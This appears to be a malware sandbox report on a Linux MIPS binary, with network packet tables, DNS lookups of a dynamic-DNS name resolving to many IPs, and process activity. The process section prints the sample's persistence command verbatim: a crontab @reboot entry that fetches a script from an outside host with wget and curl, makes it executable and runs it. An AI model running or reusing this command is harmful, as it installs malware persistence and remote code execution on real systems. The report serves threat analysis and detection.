                                                    Oct 24, 2024 16:43:17.970912933 CEST677347754193.233.193.45192.168.2.23
                                                    Oct 24, 2024 16:43:17.971041918 CEST477546773192.168.2.23193.233.193.45
                                                    Oct 24, 2024 16:43:17.971060038 CEST477546773192.168.2.23193.233.193.45
                                                    Oct 24, 2024 16:43:17.978065968 CEST677347754193.233.193.45192.168.2.23
                                                    Oct 24, 2024 16:43:17.978151083 CEST477546773192.168.2.23193.233.193.45
                                                    Oct 24, 2024 16:43:17.984677076 CEST677347754193.233.193.45192.168.2.23
                                                    Oct 24, 2024 16:43:19.275266886 CEST677347754193.233.193.45192.168.2.23
                                                    Oct 24, 2024 16:43:19.275669098 CEST477546773192.168.2.23193.233.193.45
                                                    Oct 24, 2024 16:43:19.275845051 CEST477546773192.168.2.23193.233.193.45
                                                    Oct 24, 2024 16:43:20.006732941 CEST42836443192.168.2.2391.189.91.43
                                                    Oct 24, 2024 16:43:20.113254070 CEST33606443192.168.2.2354.171.230.55
                                                    Oct 24, 2024 16:43:20.120007038 CEST4433360654.171.230.55192.168.2.23
                                                    Oct 24, 2024 16:43:20.120096922 CEST33606443192.168.2.2354.171.230.55
                                                    Oct 24, 2024 16:43:21.824604034 CEST5201415553192.168.2.2386.107.100.80
                                                    Oct 24, 2024 16:43:21.830503941 CEST155535201486.107.100.80192.168.2.23
                                                    Oct 24, 2024 16:43:22.320971012 CEST155535201486.107.100.80192.168.2.23
                                                    Oct 24, 2024 16:43:22.321278095 CEST5201415553192.168.2.2386.107.100.80
                                                    Oct 24, 2024 16:43:24.377434969 CEST6007418836192.168.2.2388.151.195.22
                                                    Oct 24, 2024 16:43:24.383594990 CEST188366007488.151.195.22192.168.2.23
                                                    Oct 24, 2024 16:43:24.383660078 CEST6007418836192.168.2.2388.151.195.22
                                                    Oct 24, 2024 16:43:24.383677959 CEST6007418836192.168.2.2388.151.195.22
                                                    Oct 24, 2024 16:43:24.389733076 CEST188366007488.151.195.22192.168.2.23
                                                    Oct 24, 2024 16:43:24.389846087 CEST6007418836192.168.2.2388.151.195.22
                                                    Oct 24, 2024 16:43:24.395948887 CEST188366007488.151.195.22192.168.2.23
                                                    Oct 24, 2024 16:43:26.150202990 CEST4251680192.168.2.23109.202.202.202
                                                    Oct 24, 2024 16:43:34.393007040 CEST6007418836192.168.2.2388.151.195.22
                                                    Oct 24, 2024 16:43:34.399962902 CEST188366007488.151.195.22192.168.2.23
                                                    Oct 24, 2024 16:43:34.702675104 CEST188366007488.151.195.22192.168.2.23
                                                    Oct 24, 2024 16:43:34.702891111 CEST6007418836192.168.2.2388.151.195.22
                                                    Oct 24, 2024 16:43:50.722604990 CEST43928443192.168.2.2391.189.91.42
                                                    Oct 24, 2024 16:44:11.199793100 CEST42836443192.168.2.2391.189.91.43
                                                    Oct 24, 2024 16:44:42.383055925 CEST5201415553192.168.2.2386.107.100.80
                                                    Oct 24, 2024 16:44:42.389170885 CEST155535201486.107.100.80192.168.2.23
                                                    Oct 24, 2024 16:44:42.880464077 CEST155535201486.107.100.80192.168.2.23
                                                    Oct 24, 2024 16:44:42.880759001 CEST5201415553192.168.2.2386.107.100.80
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Oct 24, 2024 16:42:49.670624971 CEST4686653192.168.2.2370.34.254.19
                                                    Oct 24, 2024 16:42:49.832135916 CEST5134953192.168.2.2370.34.254.19
                                                    Oct 24, 2024 16:42:54.677063942 CEST3856953192.168.2.23168.235.111.72
                                                    Oct 24, 2024 16:42:54.765528917 CEST5338569168.235.111.72192.168.2.23
                                                    Oct 24, 2024 16:42:54.838568926 CEST5575553192.168.2.23168.235.111.72
                                                    Oct 24, 2024 16:42:54.929008961 CEST5355755168.235.111.72192.168.2.23
                                                    Oct 24, 2024 16:43:00.874450922 CEST5864953192.168.2.23202.61.197.122
                                                    Oct 24, 2024 16:43:00.885505915 CEST5358649202.61.197.122192.168.2.23
                                                    Oct 24, 2024 16:43:01.132369041 CEST3677353192.168.2.23202.61.197.122
                                                    Oct 24, 2024 16:43:01.143390894 CEST5336773202.61.197.122192.168.2.23
                                                    Oct 24, 2024 16:43:06.759756088 CEST5942153192.168.2.2364.176.6.48
                                                    Oct 24, 2024 16:43:06.960573912 CEST4531153192.168.2.2364.176.6.48
                                                    Oct 24, 2024 16:43:11.766242981 CEST3892353192.168.2.2380.152.203.134
                                                    Oct 24, 2024 16:43:11.808104038 CEST533892380.152.203.134192.168.2.23
                                                    Oct 24, 2024 16:43:11.966779947 CEST4777953192.168.2.2380.152.203.134
                                                    Oct 24, 2024 16:43:12.003009081 CEST534777980.152.203.134192.168.2.23
                                                    Oct 24, 2024 16:43:17.949124098 CEST4714553192.168.2.23152.53.15.127
                                                    Oct 24, 2024 16:43:17.960541010 CEST5347145152.53.15.127192.168.2.23
                                                    Oct 24, 2024 16:43:24.282350063 CEST4827153192.168.2.23168.235.111.72
                                                    Oct 24, 2024 16:43:24.375598907 CEST5348271168.235.111.72192.168.2.23
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Oct 24, 2024 16:42:49.670624971 CEST192.168.2.2370.34.254.190x49dbStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:42:49.832135916 CEST192.168.2.2370.34.254.190x49dbStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:42:54.677063942 CEST192.168.2.23168.235.111.720x3192Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:42:54.838568926 CEST192.168.2.23168.235.111.720x3192Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:00.874450922 CEST192.168.2.23202.61.197.1220x17cStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:01.132369041 CEST192.168.2.23202.61.197.1220x17cStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:06.759756088 CEST192.168.2.2364.176.6.480x52cdStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:06.960573912 CEST192.168.2.2364.176.6.480x52cdStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:11.766242981 CEST192.168.2.2380.152.203.1340x9fceStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:11.966779947 CEST192.168.2.2380.152.203.1340x9fceStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:17.949124098 CEST192.168.2.23152.53.15.1270x376bStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:24.282350063 CEST192.168.2.23168.235.111.720x2a57Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Oct 24, 2024 16:42:54.765528917 CEST168.235.111.72192.168.2.230x3192No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:42:54.765528917 CEST168.235.111.72192.168.2.230x3192No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:42:54.765528917 CEST168.235.111.72192.168.2.230x3192No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:42:54.765528917 CEST168.235.111.72192.168.2.230x3192No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:42:54.765528917 CEST168.235.111.72192.168.2.230x3192No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:42:54.765528917 CEST168.235.111.72192.168.2.230x3192No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:42:54.765528917 CEST168.235.111.72192.168.2.230x3192No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:42:54.765528917 CEST168.235.111.72192.168.2.230x3192No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:42:54.765528917 CEST168.235.111.72192.168.2.230x3192No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:42:54.765528917 CEST168.235.111.72192.168.2.230x3192No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:42:54.765528917 CEST168.235.111.72192.168.2.230x3192No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:42:54.929008961 CEST168.235.111.72192.168.2.230x3192No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:42:54.929008961 CEST168.235.111.72192.168.2.230x3192No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:42:54.929008961 CEST168.235.111.72192.168.2.230x3192No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:42:54.929008961 CEST168.235.111.72192.168.2.230x3192No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:42:54.929008961 CEST168.235.111.72192.168.2.230x3192No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:42:54.929008961 CEST168.235.111.72192.168.2.230x3192No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:42:54.929008961 CEST168.235.111.72192.168.2.230x3192No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:42:54.929008961 CEST168.235.111.72192.168.2.230x3192No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:42:54.929008961 CEST168.235.111.72192.168.2.230x3192No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:42:54.929008961 CEST168.235.111.72192.168.2.230x3192No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:42:54.929008961 CEST168.235.111.72192.168.2.230x3192No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:00.885505915 CEST202.61.197.122192.168.2.230x17cNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:00.885505915 CEST202.61.197.122192.168.2.230x17cNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:00.885505915 CEST202.61.197.122192.168.2.230x17cNo error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:00.885505915 CEST202.61.197.122192.168.2.230x17cNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:00.885505915 CEST202.61.197.122192.168.2.230x17cNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:00.885505915 CEST202.61.197.122192.168.2.230x17cNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:00.885505915 CEST202.61.197.122192.168.2.230x17cNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:00.885505915 CEST202.61.197.122192.168.2.230x17cNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:00.885505915 CEST202.61.197.122192.168.2.230x17cNo error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:00.885505915 CEST202.61.197.122192.168.2.230x17cNo error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:00.885505915 CEST202.61.197.122192.168.2.230x17cNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:01.143390894 CEST202.61.197.122192.168.2.230x17cNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:01.143390894 CEST202.61.197.122192.168.2.230x17cNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:01.143390894 CEST202.61.197.122192.168.2.230x17cNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:01.143390894 CEST202.61.197.122192.168.2.230x17cNo error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:01.143390894 CEST202.61.197.122192.168.2.230x17cNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:01.143390894 CEST202.61.197.122192.168.2.230x17cNo error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:01.143390894 CEST202.61.197.122192.168.2.230x17cNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:01.143390894 CEST202.61.197.122192.168.2.230x17cNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:01.143390894 CEST202.61.197.122192.168.2.230x17cNo error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:01.143390894 CEST202.61.197.122192.168.2.230x17cNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:01.143390894 CEST202.61.197.122192.168.2.230x17cNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:11.808104038 CEST80.152.203.134192.168.2.230x9fceNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:11.808104038 CEST80.152.203.134192.168.2.230x9fceNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:11.808104038 CEST80.152.203.134192.168.2.230x9fceNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:11.808104038 CEST80.152.203.134192.168.2.230x9fceNo error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:11.808104038 CEST80.152.203.134192.168.2.230x9fceNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:11.808104038 CEST80.152.203.134192.168.2.230x9fceNo error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:11.808104038 CEST80.152.203.134192.168.2.230x9fceNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:11.808104038 CEST80.152.203.134192.168.2.230x9fceNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:11.808104038 CEST80.152.203.134192.168.2.230x9fceNo error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:11.808104038 CEST80.152.203.134192.168.2.230x9fceNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:11.808104038 CEST80.152.203.134192.168.2.230x9fceNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:12.003009081 CEST80.152.203.134192.168.2.230x9fceNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:12.003009081 CEST80.152.203.134192.168.2.230x9fceNo error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:12.003009081 CEST80.152.203.134192.168.2.230x9fceNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:12.003009081 CEST80.152.203.134192.168.2.230x9fceNo error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:12.003009081 CEST80.152.203.134192.168.2.230x9fceNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:12.003009081 CEST80.152.203.134192.168.2.230x9fceNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:12.003009081 CEST80.152.203.134192.168.2.230x9fceNo error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:12.003009081 CEST80.152.203.134192.168.2.230x9fceNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:12.003009081 CEST80.152.203.134192.168.2.230x9fceNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:12.003009081 CEST80.152.203.134192.168.2.230x9fceNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:12.003009081 CEST80.152.203.134192.168.2.230x9fceNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:17.960541010 CEST152.53.15.127192.168.2.230x376bNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:17.960541010 CEST152.53.15.127192.168.2.230x376bNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:17.960541010 CEST152.53.15.127192.168.2.230x376bNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:17.960541010 CEST152.53.15.127192.168.2.230x376bNo error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:17.960541010 CEST152.53.15.127192.168.2.230x376bNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:17.960541010 CEST152.53.15.127192.168.2.230x376bNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:17.960541010 CEST152.53.15.127192.168.2.230x376bNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:17.960541010 CEST152.53.15.127192.168.2.230x376bNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:17.960541010 CEST152.53.15.127192.168.2.230x376bNo error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:17.960541010 CEST152.53.15.127192.168.2.230x376bNo error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:17.960541010 CEST152.53.15.127192.168.2.230x376bNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:24.375598907 CEST168.235.111.72192.168.2.230x2a57No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:24.375598907 CEST168.235.111.72192.168.2.230x2a57No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:24.375598907 CEST168.235.111.72192.168.2.230x2a57No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:24.375598907 CEST168.235.111.72192.168.2.230x2a57No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:24.375598907 CEST168.235.111.72192.168.2.230x2a57No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:24.375598907 CEST168.235.111.72192.168.2.230x2a57No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:24.375598907 CEST168.235.111.72192.168.2.230x2a57No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:24.375598907 CEST168.235.111.72192.168.2.230x2a57No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:24.375598907 CEST168.235.111.72192.168.2.230x2a57No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:24.375598907 CEST168.235.111.72192.168.2.230x2a57No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                    Oct 24, 2024 16:43:24.375598907 CEST168.235.111.72192.168.2.230x2a57No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false

                                                    System Behavior

                                                    Start time (UTC):14:42:48
                                                    Start date (UTC):24/10/2024
                                                    Path:/tmp/hmips.elf
                                                    Arguments:/tmp/hmips.elf
                                                    File size:5777432 bytes
                                                    MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                    Start time (UTC):14:42:48
                                                    Start date (UTC):24/10/2024
                                                    Path:/tmp/hmips.elf
                                                    Arguments:-
                                                    File size:5777432 bytes
                                                    MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                    Start time (UTC):14:42:48
                                                    Start date (UTC):24/10/2024
                                                    Path:/bin/sh
                                                    Arguments:sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):14:42:48
                                                    Start date (UTC):24/10/2024
                                                    Path:/bin/sh
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):14:42:48
                                                    Start date (UTC):24/10/2024
                                                    Path:/bin/sh
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):14:42:48
                                                    Start date (UTC):24/10/2024
                                                    Path:/usr/bin/crontab
                                                    Arguments:crontab -l
                                                    File size:43720 bytes
                                                    MD5 hash:66e521d421ac9b407699061bf21806f5

                                                    Start time (UTC):14:42:48
                                                    Start date (UTC):24/10/2024
                                                    Path:/bin/sh
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):14:42:48
                                                    Start date (UTC):24/10/2024
                                                    Path:/usr/bin/crontab
                                                    Arguments:crontab -
                                                    File size:43720 bytes
                                                    MD5 hash:66e521d421ac9b407699061bf21806f5

                                                    Start time (UTC):14:42:48
                                                    Start date (UTC):24/10/2024
                                                    Path:/tmp/hmips.elf
                                                    Arguments:-
                                                    File size:5777432 bytes
                                                    MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                    Start time (UTC):14:42:48
                                                    Start date (UTC):24/10/2024
                                                    Path:/tmp/hmips.elf
                                                    Arguments:-
                                                    File size:5777432 bytes
                                                    MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                    Start time (UTC):14:42:48
                                                    Start date (UTC):24/10/2024
                                                    Path:/tmp/hmips.elf
                                                    Arguments:-
                                                    File size:5777432 bytes
                                                    MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                    Start time (UTC):14:43:19
                                                    Start date (UTC):24/10/2024
                                                    Path:/usr/bin/dash
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):14:43:19
                                                    Start date (UTC):24/10/2024
                                                    Path:/usr/bin/rm
                                                    Arguments:rm -f /tmp/tmp.65q81DRzJS /tmp/tmp.BPOhT08nAE /tmp/tmp.DimVUE3TAX
                                                    File size:72056 bytes
                                                    MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                    Start time (UTC):14:43:19
                                                    Start date (UTC):24/10/2024
                                                    Path:/usr/bin/dash
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):14:43:19
                                                    Start date (UTC):24/10/2024
                                                    Path:/usr/bin/rm
                                                    Arguments:rm -f /tmp/tmp.65q81DRzJS /tmp/tmp.BPOhT08nAE /tmp/tmp.DimVUE3TAX
                                                    File size:72056 bytes
                                                    MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b